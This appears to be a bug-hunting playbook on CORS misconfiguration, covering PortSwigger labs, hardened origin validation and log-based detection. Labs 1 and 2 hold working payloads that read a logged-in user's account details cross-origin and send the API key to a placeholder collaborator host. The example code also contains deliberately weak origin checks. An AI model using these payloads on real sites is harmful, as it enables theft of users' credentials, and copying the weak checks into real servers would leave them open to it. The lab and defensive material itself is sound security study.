---
name: "CORS Misconfiguration — Complete Deep Dive"
description: "Complete PortSwigger deep-dive with exact payloads for every lab variant including zero-day techniques"
domain: cybersecurity
subdomain: bug-hunting
version: "1.0.0"
category: "bug-hunting/deep-dive-labs"
tags: [portswigger, deep-dive, exploitation, zero-day, lab-solutions]
mitre_attack: ["T1189"]
tools: [burp-suite, curl, sqlmap, ffuf, python]
difficulty: "advanced"
---
# CORS Misconfiguration — Complete Deep Dive

Deep-Dive Lab Playbook — Every PortSwigger lab variant with exact payloads, bypass techniques, and zero-day extensions.

Difficulty: 🟢 Apprentice · 🟡 Practitioner · 🔴 Expert
## When to Use
- Studying for BSCP (Burp Suite Certified Practitioner) certification
- Testing real-world targets for these vulnerability classes
- Bug bounty hunting — these exact techniques find real bugs
- Building exploitation chains
## Prerequisites
- Burp Suite Professional (Community works for most)
- Browser with proxy configured
- Burp Collaborator or interactsh for OOB testing
## Workflow

### Phase 1: Reconnaissance
- Identify input vectors, parameters, and application behavior.
### Phase 2: Exploitation
- Apply standard lab payloads.
### Phase 3: Zero-Day Escalation
- Fuzz filters, bypass WAFs, and chain with other vulns.
## Lab Playbooks

### Lab 1: Basic origin reflection 🟢 APPRENTICE

```html
<script>
// Runs from the attacker-controlled page. The browser sets the Origin header to that
// page's origin by itself; Origin is a forbidden header and cannot be set from script,
// so a manual 'Origin' entry in the fetch headers is silently dropped.
fetch('https://TARGET/accountDetails', {credentials: 'include'})
  .then(r => r.json())
  .then(d => fetch('https://COLLAB/?key=' + d.apikey));
</script>
```

Server reflects any Origin in Access-Control-Allow-Origin with Access-Control-Allow-Credentials: true, so the cross-origin page can read the authenticated response.
### Lab 2: Trusted null origin 🟡 PRACTITIONER

```html
<iframe sandbox="allow-scripts allow-forms"
  srcdoc="<script>fetch('https://TARGET/accountDetails',{credentials:'include'}).then(r=>r.json()).then(d=>fetch('https://COLLAB/?'+d.apikey));</script>">
</iframe>
```

A sandboxed iframe (no `allow-same-origin`) has an opaque origin, so the browser sends `Origin: null`, which the server trusts and reflects with credentials allowed.
### Lab 3: Trusted insecure protocols 🟡 PRACTITIONER

Find a subdomain with XSS reachable over HTTP. The CORS policy trusts `*.target.com` including `http://` origins. Chain: subdomain XSS → CORS bypass → steal API key.
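All three labs come down to the same server-side mistake: deciding `Access-Control-Allow-Origin` from the request's `Origin` header with a check that is too loose. The following is an added example, not PortSwigger's lab code or any project's implementation: it places the three weak checks (reflect anything, trust `null`, match a host suffix regardless of scheme) beside a strict allow-list check. The trusted origins `https://app.target.example` and `https://admin.target.example` are constructed for the example; it also covers the `eviltarget.example` suffix case, which goes beyond the labs above.

```javascript
// Added example: origin validation for credentialed CORS responses.
// TRUSTED_ORIGINS is a constructed allow-list, not from any real deployment.
const TRUSTED_ORIGINS = new Set([
  'https://app.target.example',
  'https://admin.target.example',
]);

// Lab 1 pattern: echo whatever Origin arrives and allow credentials.
// Any site can then read authenticated responses.
function weakReflectOrigin(originHeader) {
  if (originHeader === undefined) return null;
  return {
    'Access-Control-Allow-Origin': originHeader,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Lab 2 pattern: 'null' is accepted (sandboxed iframes and some redirects send it).
// Lab 3 pattern: suffix match on the host with the scheme ignored, so
// http://xss.target.example passes, and so does https://eviltarget.example.
function weakSuffixMatch(originHeader) {
  if (originHeader === undefined) return null;
  if (originHeader === 'null' || originHeader.endsWith('target.example')) {
    return {
      'Access-Control-Allow-Origin': originHeader,
      'Access-Control-Allow-Credentials': 'true',
    };
  }
  return null;
}

// Hardened: the full origin (scheme + host + port) must exactly equal an entry in a
// fixed set; 'null' is never trusted; only https is accepted; and Vary: Origin stops
// a shared cache from serving one origin's grant to another.
function strictAllowOrigin(originHeader) {
  if (typeof originHeader !== 'string' || originHeader === 'null') return null;
  let parsed;
  try {
    parsed = new URL(originHeader);
  } catch {
    return null; // not a syntactically valid origin
  }
  if (parsed.protocol !== 'https:' || !TRUSTED_ORIGINS.has(parsed.origin)) return null;
  // URL.origin normalizes case and default ports; insist the raw header already
  // equals that normalized form so trailing paths or odd encodings are rejected.
  if (parsed.origin !== originHeader) return null;
  return {
    'Access-Control-Allow-Origin': parsed.origin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin',
  };
}

// Stand-alone demo over a few constructed Origin values.
const SAMPLE_ORIGINS = [
  'https://app.target.example',
  'https://evil.example',
  'null',
  'http://xss.target.example',
  'https://eviltarget.example',
];
for (const o of SAMPLE_ORIGINS) {
  console.log(o, '| reflect:', !!weakReflectOrigin(o),
              '| suffix:', !!weakSuffixMatch(o), '| strict:', !!strictAllowOrigin(o));
}
```

The strict variant deliberately refuses anything it cannot parse as an `https` origin and compares the whole origin string rather than a hostname fragment; a regex such as `target\.example$` would still accept `eviltarget.example`, and an unanchored one would accept `target.example.evil.example`.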
## Blue Team Detection

- Monitor access logs for responses whose Access-Control-Allow-Origin echoes an unexpected request Origin (attacker-controlled, `null`, or `http://`) together with Access-Control-Allow-Credentials: true.
- Validate the Origin header server-side against an explicit allow-list of full origins (scheme, host, port); never reflect it, never trust `null`, and never match on a host suffix.
- Create WAF rules that flag generic attack patterns as a secondary control, not as a substitute for correct server-side origin validation.
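The first bullet can be checked offline against logs. The following is an added example, not part of this playbook or any vendor tooling: it runs over constructed JSON-lines access-log records (the schema with `origin`, `acao`, `acac` fields is an assumption) and reports responses that granted CORS access outside the allow-list, distinguishing reflected origins, `null`, insecure-scheme origins, and wildcard-with-credentials. The trusted origin `https://app.target.example` is constructed for the example.

```javascript
// Added example: CORS misconfiguration detection over access-log records.
// Log schema (constructed): one JSON object per response with the request Origin
// and the CORS response headers; acao/acac are absent when the server sent none.
const TRUSTED = new Set(['https://app.target.example']);

const SAMPLE_LOG = [
  '{"ts":"2024-01-01T10:00:00Z","path":"/accountDetails","origin":"https://app.target.example","acao":"https://app.target.example","acac":"true","status":200}',
  '{"ts":"2024-01-01T10:00:01Z","path":"/accountDetails","origin":"https://evil.example","acao":"https://evil.example","acac":"true","status":200}',
  '{"ts":"2024-01-01T10:00:02Z","path":"/accountDetails","origin":"null","acao":"null","acac":"true","status":200}',
  '{"ts":"2024-01-01T10:00:03Z","path":"/accountDetails","origin":"http://stock.target.example","acao":"http://stock.target.example","acac":"true","status":200}',
  '{"ts":"2024-01-01T10:00:04Z","path":"/","origin":"https://evil.example","status":200}',
  '{"ts":"2024-01-01T10:00:05Z","path":"/api/public","acao":"*","status":200}',
];

// Returns the list of reasons a single record looks like a CORS misconfiguration
// (empty when the response granted nothing the browser would not already block).
function classify(rec, trusted) {
  const reasons = [];
  const acao = rec.acao;
  if (acao === undefined) return reasons; // no grant: the browser blocks the read
  const cred = rec.acac === 'true';
  if (acao === 'null') reasons.push('null origin allowed');
  if (acao.startsWith('http:')) reasons.push('insecure-scheme origin allowed');
  if (acao === '*' && cred) reasons.push('wildcard with credentials');
  if (acao !== '*' && acao !== 'null' && !trusted.has(acao)) {
    reasons.push(rec.origin === acao ? 'request Origin reflected' : 'untrusted origin allowed');
  }
  // Credentials plus any grant outside the allow-list is the high-impact case.
  if (cred && reasons.length > 0) reasons.push('credentialed');
  return reasons;
}

// Scans JSON-lines records and returns one finding per anomalous response.
function findCorsAnomalies(lines, trusted = TRUSTED) {
  const findings = [];
  lines.forEach((line, i) => {
    let rec;
    try {
      rec = JSON.parse(line);
    } catch {
      return; // skip malformed lines rather than abort the scan
    }
    const reasons = classify(rec, trusted);
    if (reasons.length) {
      findings.push({ line: i + 1, path: rec.path, origin: rec.origin, acao: rec.acao, reasons });
    }
  });
  return findings;
}

// Stand-alone demo over the constructed log.
for (const f of findCorsAnomalies(SAMPLE_LOG)) {
  console.log(`line ${f.line} ${f.path} acao=${f.acao}: ${f.reasons.join(', ')}`);
}
```

A bare `*` without credentials is left alone, since browsers never expose credentialed responses under a wildcard and a public endpoint may legitimately use it; everything else outside the allow-list is reported, with the credentialed cases marked so they can be triaged first.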
## Zero-Day Research Methodology

When a standard technique doesn't work:
- Identify the filter: What chars/patterns are blocked?
- Research bypasses: Search GitHub, Twitter, PortSwigger Research for new techniques
- Fuzz extensively: Use Burp Intruder with custom charset/tag lists
- Chain vulnerabilities: Combine two medium findings into one critical
- Check encoding layers: URL, HTML entity, Unicode, double-encode, XML entity
## Key Concepts
| Concept | Description |
|---|---|
| PortSwigger Vectors | Standardized approaches to vulnerability classes. |
| Payload Encoding | Modifying payloads to bypass basic string matching WAFs. |
## Output Format

```text
Vulnerability Deep-Dive Report
==============================
Target Vector: [Endpoint]
Bypass Technique: [Explanation of bypass]
Payload Used: [Payload]
Impact Explanation: [Impact]
```
## 🔵 Blue Team
- Deploy robust WAF rules to detect anomalies.
- Monitor logs for unusual access patterns.
## 🛡️ Remediation & Mitigation Strategy
- Input Validation: Sanitize and strictly type-check all inputs.
- Least Privilege: Constrain component execution bounds.
## 📚 Shared Resources

For cross-cutting methodology applicable to all vulnerability classes, see:

- `_shared/references/elite-chaining-strategy.md` — Exploit chaining methodology and high-payout chain patterns
- `_shared/references/elite-report-writing.md` — HackerOne-optimized report writing, CWE quick reference
- `_shared/references/real-world-bounties.md` — Verified disclosed bounties by vulnerability class